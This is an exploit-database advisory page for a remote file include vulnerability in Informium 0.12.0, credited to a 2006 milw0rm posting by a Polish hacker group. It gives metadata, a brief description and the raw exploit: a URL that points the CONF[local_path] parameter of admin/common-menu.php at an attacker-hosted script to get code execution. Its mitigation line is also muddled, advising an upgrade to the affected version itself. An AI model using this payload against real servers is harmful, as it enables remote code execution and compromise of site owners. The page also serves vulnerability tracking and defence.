Informium 0.12.0 - Remote File Include Vulnerabilities

vendor:

Informium

by:

Kacper (Rahim)

8.8

CVSS

HIGH

Remote File Include

CWE

Product Name: Informium

Affected Version From: 0.12.0

Affected Version To: 0.12.0

Patch Exists: YES

Related CWE: N/A

CPE: a:informium:informium:0.12.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Informium 0.12.0 – Remote File Include Vulnerabilities

A remote file include vulnerability exists in Informium 0.12.0. An attacker can exploit this vulnerability to include arbitrary files from remote locations by sending a specially crafted HTTP request to the vulnerable server. This can lead to arbitrary code execution on the vulnerable server.

Mitigation:

Upgrade to the latest version of Informium 0.12.0 or later.

Source

Exploit-DB raw data:

################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# Informium 0.12.0 - Remote File Include Vulnerabilities
# Script site: http://prdownloads.sourceforge.net/informium/
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################
Expl:

http://www.site.com/[Informium_path]/admin/common-menu.php?CONF[local_path]=[evil_scripts]

# milw0rm.com [2006-06-02]